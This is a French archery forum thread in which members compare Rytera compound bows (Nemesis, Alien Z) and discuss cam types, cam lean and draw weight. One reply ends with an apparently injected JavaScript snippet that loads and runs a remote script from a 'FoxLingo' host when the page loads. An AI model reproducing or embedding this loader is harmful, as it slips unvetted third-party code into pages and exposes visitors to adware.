AccueilAccueil  RechercherRechercher  S'enregistrerS'enregistrer  FacebookFacebook  ConnexionConnexion  
Le Deal du moment : -21%
LEGO® Icons 10329 Les Plantes Miniatures, ...
Voir le deal
39.59 €

 

 Renseignement arc Rytera

Aller en bas 
+2
Illyan
razzortec
6 participants
AuteurMessage
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 13:00

Bonjour

Je cherche un arc pour remplacer mon Prestige.
Le Nemesis et l'Alien Z font partis de mon top 5.
Lequel est le plus adapté au Fita/ Campagne selon vous ?

D'autre part, ayant une allonge assez courte (27''), d'après le site de Rytera, l'Allien apparemment ne permet qu'un réglage de 28 à 31''
Et pourtant sur certains magasin de vente en ligne, notamment sur le @store de Rytera, il est disponible en 27'' ????

Le Nemesis quand a lui existe avec des Hybrix 1.5 ou 2.0, et pourtant, sur la photo de leur site des modèles 2012, il est monté en One Cam ??

Si quelqu'un a des infos
Merci
Revenir en haut Aller en bas
Illyan
Testeur Fou
Testeur Fou
Illyan


Masculin Nombre de messages : 8376
Age : 52
Localisation : Chez moi ^^
Matériel : Martin Axon 36 2018
Date d'inscription : 17/12/2007

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 13:21

L'Alien Z est le plus orienté "FITA/Campagne" des deux, bien que le Nemesis pourra tout aussi bien faire l'affaire, surtout si tu as une allonge courte.

Les arcs Rytera sont proposé avec les deux systèmes de cames: Hybrix ou Tranz Cam.

Les Tranz Cam sont réglable sur une plage d'allonge plus grande que les Hybrix, donc un Alien Z en Tranz Cam couvrira de 26" à 31" je pense...et sera très souple, tout en gardant une bonne vitesse pour un One-Cam (donnée à 320 fps IBO si mes souvenirs sont bons).

Attention: en 2013 les arcs Rytera ré-intègrent la collection Martin Archery
Revenir en haut Aller en bas
http://www.deadcenterarchery.com/main/index.php
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 15:55

Merci Illyan pour ta réponse rapide


!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="http://edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Revenir en haut Aller en bas
bauer.40
Fleche Jaune
Fleche Jaune
bauer.40


Masculin Nombre de messages : 2690
Age : 51
Localisation : DAX
Matériel : Perfexion 2015/16 Xpedition Archery+Axcel Achieve Carbon+Scope 3DNA ArrowTech+Vaportrail Micro Elite Limb Driver+stab Dead Center Archery Products+ AUREL Agil 400+pointes et Pin ArrowTech
Date d'inscription : 16/11/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 17:27

razzortec a écrit:
Bonjour

Je cherche un arc pour remplacer mon Prestige.
Le Nemesis et l'Alien Z font partis de mon top 5.
Lequel est le plus adapté au Fita/ Campagne selon vous ?

D'autre part, ayant une allonge assez courte (27''), d'après le site de Rytera, l'Allien apparemment ne permet qu'un réglage de 28 à 31''
Et pourtant sur certains magasin de vente en ligne, notamment sur le @store de Rytera, il est disponible en 27'' ????

Le Nemesis quand a lui existe avec des Hybrix 1.5 ou 2.0, et pourtant, sur la photo de leur site des modèles 2012, il est monté en One Cam ??

Si quelqu'un a des infos
Merci

Pour les Rytera c'est comme l'a dit Illyan pour 2013 ils sont de retour au catalogue Martin donc c'est surtout savoir si tu es intéressé par les modèles 2013 ou les 2012 ! Si c'est les modèles 2012 chez l'importateur il reste plus grand chose, pour le Némésis il en reste 1 en 60lbs, 1 en 50 lbs et 1 en 70lbs et tous en couleur Camo et pour l'alien Z il en reste 1 en 60lbs Black Carbon et 2 50lbs en black et l'autre en Camo ! Tous en Cam Hybrix et allonge 27-30".
Revenir en haut Aller en bas
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 22:32

Ok merci
Donc pour le Nemesis c'est rapé, reste un Z.


Je vais voir également du coté de chez PSE, le Phenon me semble pas mal.
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 22:35

razzortec a écrit:
Ok merci
Donc pour le Nemesis c'est rapé, reste un Z.


Je vais voir également du coté de chez PSE, le Phenon me semble pas mal.

¨¨ Je l'ai repéré aussi.
Mais je me suis tellement habitué au binary ( ou 2 tracks ) et ça simplicité de réglage qu'aller vers d'autres trucs me ralenti.
Revenir en haut Aller en bas
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyVen 09 Nov 2012, 22:43

Zorg a écrit:


¨¨ Je l'ai repéré aussi.
Mais je me suis tellement habitué au binary ( ou 2 tracks ) et ça simplicité de réglage qu'aller vers d'autres trucs me ralenti.

Le binary c'est quoi ?
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptySam 10 Nov 2012, 00:02

razzortec a écrit:
Zorg a écrit:


¨¨ Je l'ai repéré aussi.
Mais je me suis tellement habitué au binary ( ou 2 tracks ) et ça simplicité de réglage qu'aller vers d'autres trucs me ralenti.

Le binary c'est quoi ?

Binary cam: les cames sont esclaves l'une de l'autre; pas de yoke ou de câble fixé aux branches.
Maintenant, ils appellent ça 2 tracks ( ou 3 tracks ) mais dans l'idée c'est pareil.

De mémoire c'est une technologie de ce type sur les rytera cheers, si Illyan veut bien le confirmer.
Revenir en haut Aller en bas
Illyan
Testeur Fou
Testeur Fou
Illyan


Masculin Nombre de messages : 8376
Age : 52
Localisation : Chez moi ^^
Matériel : Martin Axon 36 2018
Date d'inscription : 17/12/2007

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptySam 10 Nov 2012, 09:57

Zorg a écrit:
razzortec a écrit:
Zorg a écrit:


¨¨ Je l'ai repéré aussi.
Mais je me suis tellement habitué au binary ( ou 2 tracks ) et ça simplicité de réglage qu'aller vers d'autres trucs me ralenti.

Le binary c'est quoi ?

Binary cam: les cames sont esclaves l'une de l'autre; pas de yoke ou de câble fixé aux branches.
Maintenant, ils appellent ça 2 tracks ( ou 3 tracks ) mais dans l'idée c'est pareil.

De mémoire c'est une technologie de ce type sur les rytera cheers, si Illyan veut bien le confirmer.

Les Hybrix sont des Binary Cam, je confirme...

Après c'est aussi une histoire de gout, à l'instar des motards on trouve des amoureux de twin ou de gros mono...
Revenir en haut Aller en bas
http://www.deadcenterarchery.com/main/index.php
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptySam 10 Nov 2012, 11:12

Je savais pas que cella s'appelait comme ça.
Donc pas de yoke comme sur les Hoyt et PSE.
N'ayant jamais tiré avec un arc binary ( mes différents arcs :Polaris, Mach7, MQ1, Ultratec, Drenalin et Prestige), quelles sont avantages ? et inconvénients
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 12:16

razzortec a écrit:
Je savais pas que cella s'appelait comme ça.
Donc pas de yoke comme sur les Hoyt et PSE.
N'ayant jamais tiré avec un arc binary ( mes différents arcs :Polaris, Mach7, MQ1, Ultratec, Drenalin et Prestige), quelles sont avantages ? et inconvénients

J'ai un PSE Durango: la copie PSE du MQ1 de Mathews.
Ca a couté une fortune à PSE en dédommagements pirat pirat pirat

Binary:
Avantages
Simplicité
Toujours synchro puisque les cames sont esclaves l'une de l'autre
Hyper tuning possible

Inconvénient:
On lui reproche de donner du cam lean. ( comme beaucoup d'arcs au passage )
Mon GTO en a beaucoup, ça ne l'empêche pas d'être une bestiole redoutable de précision.
Mais il me semble que Rytera a développé des gorges pour réduire le cam lean, non ?
Revenir en haut Aller en bas
chris13310
Fleche d'Argent
Fleche d'Argent
chris13310


Masculin Nombre de messages : 4170
Age : 77
Localisation : 13310 ST MARTIN DE CRAU
Matériel : X-PEDITION XR7S, RYTERA ALIEN-X, BORDER BLACK DOUGLAS, BORDER GRIFFON
Date d'inscription : 19/02/2010

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 13:39

Après des années et des années de fidélité au One Cam ( 3 MERLIN + 2 MATHEWS ), j'ai pu constater avec mon RYTERA ALIEN-X que des doubles cames ( type binary ou pas ) bien conçues offraient les mêmes avantages de confort et de précision... Sensations confirmées depuis peu par mon NEW BREED ( toujours en cames type binary ) tout aussi agréable à utiliser...

Pour le cam lean, bien d'accord avec Zorg : tous les arcs en souffrent plus ou moins ( voir le problème récurrent sur les cames inférieures des HOYT ! ). Sur les cames Hybrix de RYTERA, les câbles s'enroulent sur des gorges hélicoïdales qui donnent de très bons résultats. Sur le NEW BREED, c'est encore mieux: le cam lean est quasi nul, même en pleine allonge.

Sur ce dernier point et pour remplacer un MATHEWS Prestige, le NEW BREED Eclipse me semble un choix intéressant, puisque l'ALIEN-Z n'est plus au catalogue.
Revenir en haut Aller en bas
bauer.40
Fleche Jaune
Fleche Jaune
bauer.40


Masculin Nombre de messages : 2690
Age : 51
Localisation : DAX
Matériel : Perfexion 2015/16 Xpedition Archery+Axcel Achieve Carbon+Scope 3DNA ArrowTech+Vaportrail Micro Elite Limb Driver+stab Dead Center Archery Products+ AUREL Agil 400+pointes et Pin ArrowTech
Date d'inscription : 16/11/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 13:41

Zorg a écrit:


Binary:
Avantages
Simplicité
Toujours synchro puisque les cames sont esclaves l'une de l'autre
Hyper tuning possible

Inconvénient:
On lui reproche de donner du cam lean. ( comme beaucoup d'arcs au passage )
Mon GTO en a beaucoup, ça ne l'empêche pas d'être une bestiole redoutable de précision.
Mais il me semble que Rytera a développé des gorges pour réduire le cam lean, non ?

Zorg tu entends quoi par hyper tuning possible?

Et par rapport au cam lean est ce qu'avec un guide cable fléxible ou angulé comme le Arctech, il y aurait moins de cam lean?
Revenir en haut Aller en bas
bauer.40
Fleche Jaune
Fleche Jaune
bauer.40


Masculin Nombre de messages : 2690
Age : 51
Localisation : DAX
Matériel : Perfexion 2015/16 Xpedition Archery+Axcel Achieve Carbon+Scope 3DNA ArrowTech+Vaportrail Micro Elite Limb Driver+stab Dead Center Archery Products+ AUREL Agil 400+pointes et Pin ArrowTech
Date d'inscription : 16/11/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 13:45

chris13310 a écrit:
Pour le cam lean, bien d'accord avec Zorg : tous les arcs en souffrent plus ou moins ( voir le problème récurrent sur les cames inférieures des HOYT ! ). Sur les cames Hybrix de RYTERA, les câbles s'enroulent sur des gorges hélicoïdales qui donnent de très bons résultats.

Donc avec ce type de cames Hybrix aucun intéret d'y mettre un flex guard ou guide cable articulé ou alors facilité le passage dans la poulie Hélicoïdale?
Revenir en haut Aller en bas
chris13310
Fleche d'Argent
Fleche d'Argent
chris13310


Masculin Nombre de messages : 4170
Age : 77
Localisation : 13310 ST MARTIN DE CRAU
Matériel : X-PEDITION XR7S, RYTERA ALIEN-X, BORDER BLACK DOUGLAS, BORDER GRIFFON
Date d'inscription : 19/02/2010

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 13:54

Le cam lean existe sur les compounds depuis que ces arcs existent ( sauf exception particulière sur des arcs sans écarteurs : ONEIDA, BLADERUNNER ou câbles dédoublés en X ). Si le phénomène est relativement faible et constant, celà ne nuit en rien à la précision des arcs, mais ça permet surtout à quelques techniciens de comptoir de se faire mousser en nous sortant des théories fumeuses sur le sujet..

C'est vrai qu' il y a eu effectivement dans le passé ( ou peut-être encore aujourd'hui ) quelques modèles d'arcs où le cam lean était excessif et nuisait à la précision pour des raisons diverses : cames mal conçues, branches un peu trop ''flexibles'', etc...
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 14:06

bauer.40 a écrit:
Zorg a écrit:


Binary:
Avantages
Simplicité
Toujours synchro puisque les cames sont esclaves l'une de l'autre
Hyper tuning possible

Inconvénient:
On lui reproche de donner du cam lean. ( comme beaucoup d'arcs au passage )
Mon GTO en a beaucoup, ça ne l'empêche pas d'être une bestiole redoutable de précision.
Mais il me semble que Rytera a développé des gorges pour réduire le cam lean, non ?

Zorg tu entends quoi par hyper tuning possible?

Et par rapport au cam lean est ce qu'avec un guide cable flexible ou angulé comme le Arctech, il y aurait moins de cam lean?

Oh ça: en fait, il existe certains fous-furieux, ou certaines archeries qui vont pousser le réglage à l'extrême de l'extrême finesse/performance de l'arc.
Vérifications et réglages des timing puis synchro, puis passages au ban avec radars etc...
Bref tout y passe.
Rien de sorcier en soi: mais beaucoup de temps à passer dessus pour amener l'arc à son maximum de rendement.


Quant au cam lean: chris13310 a tout dit.
Alors oui, on peut mettre un Arctech ou son prédecesseur le Tilt-Tamer, pour en réduire l'effet de torque cessé être donné par le cam-lean ( les fameuses théories sur le cam lean et ses effets )
Tilt-tamer a un tableau de leurs essais... mais ce sont LEURS essais.

Certains archers en ressentent positivement les effets, pour d'autres: ça ne leur apportera rien, voire pour certains, la gêne de retrouver les câbles dans leur fenêtre de tir.
Des archers de haut niveau utilisent le tilt tamer ou l'arctech, d'autres pas, et les 2 catégories ( avec ou sans ) sont pourtant au top niveau.

J'avais du torque avec mon GTO, je n'en donne plus et pourtant je n'ai rien posé dessus ( si ce n'est une petite cale de repère pour le grip afin de mieux me repérer et placer ma main d'arc )
Revenir en haut Aller en bas
Invité
Invité




Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 14:30

Zorg a écrit:
bauer.40 a écrit:
Zorg a écrit:


Binary:
Avantages
Simplicité
Toujours synchro puisque les cames sont esclaves l'une de l'autre
Hyper tuning possible

Inconvénient:
On lui reproche de donner du cam lean. ( comme beaucoup d'arcs au passage )
Mon GTO en a beaucoup, ça ne l'empêche pas d'être une bestiole redoutable de précision.
Mais il me semble que Rytera a développé des gorges pour réduire le cam lean, non ?

Zorg tu entends quoi par hyper tuning possible?

Oh ça: en fait, il existe certains fous-furieux, ou certaines archeries qui vont pousser le réglage à l'extrême de l'extrême finesse/performance de l'arc.
Vérifications et réglages des timing puis synchro, puis passages au ban avec radars etc...
Bref tout y passe.
Rien de sorcier en soi: mais beaucoup de temps à passer dessus pour amener l'arc à son maximum de rendement.
)

Renseignement arc Rytera 1337146164_small
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 14:34

klaki a écrit:
Zorg a écrit:
bauer.40 a écrit:
Zorg a écrit:


Binary:
Avantages
Simplicité
Toujours synchro puisque les cames sont esclaves l'une de l'autre
Hyper tuning possible

Inconvénient:
On lui reproche de donner du cam lean. ( comme beaucoup d'arcs au passage )
Mon GTO en a beaucoup, ça ne l'empêche pas d'être une bestiole redoutable de précision.
Mais il me semble que Rytera a développé des gorges pour réduire le cam lean, non ?


Zorg tu entends quoi par hyper tuning possible?

Oh ça: en fait, il existe certains fous-furieux, ou certaines archeries qui vont pousser le réglage à l'extrême de l'extrême finesse/performance de l'arc.
Vérifications et réglages des timing puis synchro, puis passages au ban avec radars etc...
Bref tout y passe.
Rien de sorcier en soi: mais beaucoup de temps à passer dessus pour amener l'arc à son maximum de rendement.
)

Renseignement arc Rytera 1337146164_small


XD Very Happy Very Happy Very Happy Very Happy

je sais pas pourquoi, mais je la craignais celle-là.... une intuition cheers
Revenir en haut Aller en bas
bauer.40
Fleche Jaune
Fleche Jaune
bauer.40


Masculin Nombre de messages : 2690
Age : 51
Localisation : DAX
Matériel : Perfexion 2015/16 Xpedition Archery+Axcel Achieve Carbon+Scope 3DNA ArrowTech+Vaportrail Micro Elite Limb Driver+stab Dead Center Archery Products+ AUREL Agil 400+pointes et Pin ArrowTech
Date d'inscription : 16/11/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 14:50

merci Zorg !

merci klaki iii
Revenir en haut Aller en bas
razzortec
Fleche Blanche
Fleche Blanche



Masculin Nombre de messages : 97
Age : 65
Localisation : Thann
Matériel : Nemesis, Alphaelite
Date d'inscription : 09/12/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 15:26

Merci pour toutes ces infos

Je viens de regarder la gamme Newbreed, pas mal.

Bauer.40, c'est toi qui a le Nemesis 40-50 ou c'est Bleusaille ?
Au niveau de la puissance , je monte pas au dessus de 53-54 #, j'aimerais donc savoir si un 40-50 est suffisant.
Revenir en haut Aller en bas
chris13310
Fleche d'Argent
Fleche d'Argent
chris13310


Masculin Nombre de messages : 4170
Age : 77
Localisation : 13310 ST MARTIN DE CRAU
Matériel : X-PEDITION XR7S, RYTERA ALIEN-X, BORDER BLACK DOUGLAS, BORDER GRIFFON
Date d'inscription : 19/02/2010

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 15:48

Juste pour info, une photo de la came supérieure d'un NEW BREED ECLIPSE, arc armé en pleine allonge... Question cam lean minimum, difficile de faire beaucoup mieux !

Renseignement arc Rytera 54430410
Revenir en haut Aller en bas
bauer.40
Fleche Jaune
Fleche Jaune
bauer.40


Masculin Nombre de messages : 2690
Age : 51
Localisation : DAX
Matériel : Perfexion 2015/16 Xpedition Archery+Axcel Achieve Carbon+Scope 3DNA ArrowTech+Vaportrail Micro Elite Limb Driver+stab Dead Center Archery Products+ AUREL Agil 400+pointes et Pin ArrowTech
Date d'inscription : 16/11/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 15:51

razzortec a écrit:
Merci pour toutes ces infos

Je viens de regarder la gamme Newbreed, pas mal.

Bauer.40, c'est toi qui a le Nemesis 40-50 ou c'est Bleusaille ?
Au niveau de la puissance , je monte pas au dessus de 53-54 #, j'aimerais donc savoir si un 40-50 est suffisant.

c'est Bleusaille qui a maintenant le 40/50 et j'attend le 50/60 (d'ailleur c'est 45/60lbs).
Revenir en haut Aller en bas
chris13310
Fleche d'Argent
Fleche d'Argent
chris13310


Masculin Nombre de messages : 4170
Age : 77
Localisation : 13310 ST MARTIN DE CRAU
Matériel : X-PEDITION XR7S, RYTERA ALIEN-X, BORDER BLACK DOUGLAS, BORDER GRIFFON
Date d'inscription : 19/02/2010

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 16:06

bauer.40 a écrit:
razzortec a écrit:
Merci pour toutes ces infos

Je viens de regarder la gamme Newbreed, pas mal.

Bauer.40, c'est toi qui a le Nemesis 40-50 ou c'est Bleusaille ?
Au niveau de la puissance , je monte pas au dessus de 53-54 #, j'aimerais donc savoir si un 40-50 est suffisant.

c'est Bleusaille qui a maintenant le 40/50 et j'attend le 50/60 (d'ailleur c'est 45/60lbs).

Pour les puissances, les chiffres donnés sont théoriques et peuvent varier dans une certaine mesure en fonction notamment de l'allonge.. Je m'explique : un arc donné pour 50 lbs maxi pourra donner une puissance réelle supérieure ( 52/53 lbs ) si on le tire à 29 ou 30'' d'allonge. Avec une allonge en dessous de la moyenne ( sauf si on change de taille de poulies et de flex de branches, ce qui est le cas chez NEW BREED avec 3 tailles de cames, mais pas chez RYTERA ), on aura même parfois du mal à atteindre la puissance indiquée..

Au pire ( ou au mieux ) il faudrait demander au magasin vendeur de mesurer la puissance maxi réelle de l'arc choisi à 27'' d'allonge et décider de prendre 40/50 ou 50/60 en fonction du résultat obtenu.
Revenir en haut Aller en bas
Zorg
Animateur
Zorg


Masculin Nombre de messages : 5506
Date d'inscription : 01/01/2008

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 16:26

chris13310 a écrit:
Juste pour info, une photo de la came supérieure d'un NEW BREED ECLIPSE, arc armé en pleine allonge... Question cam lean minimum, difficile de faire beaucoup mieux !

Renseignement arc Rytera 54430410

Ah oui, c'est vraiment léger, voire insignifiant.
Fort, très fort.
Revenir en haut Aller en bas
bleusaille
Fleche Bleue
Fleche Bleue
bleusaille


Féminin Nombre de messages : 865
Age : 52
Localisation : st firmin des bois
Matériel : Rytera Nemesis, stab dead steady, RF TT, AS SX200 scope viper; VAP et x7
Date d'inscription : 22/10/2011

Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera EmptyDim 11 Nov 2012, 17:25

razzortec a écrit:
Merci pour toutes ces infos

Je viens de regarder la gamme Newbreed, pas mal.

Bauer.40, c'est toi qui a le Nemesis 40-50 ou c'est Bleusaille ?
Au niveau de la puissance , je monte pas au dessus de 53-54 #, j'aimerais donc savoir si un 40-50 est suffisant.

c'est moi!

Et pour la puissance, je n'ai pas trop perdu en abaque par rapport au PSE qui etait réglé à 54# (15 mm entre 10 et 45 m) mais j'ai beaucoup gagné en confort de tir: armement plus facile, prise de grip plus aisée... et en plaisir de tir!
Revenir en haut Aller en bas
Contenu sponsorisé





Renseignement arc Rytera Empty
MessageSujet: Re: Renseignement arc Rytera   Renseignement arc Rytera Empty

Revenir en haut Aller en bas
 
Renseignement arc Rytera
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Rytera Nemesis
» Rytera Alien Z
» rytera alien x HELP !!!!
» MARTIN ARCHERY/RYTERA 2013
» Rytera 2013

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Archery-Online :: Tir à l'arc :: Partie Matériel-
Sauter vers: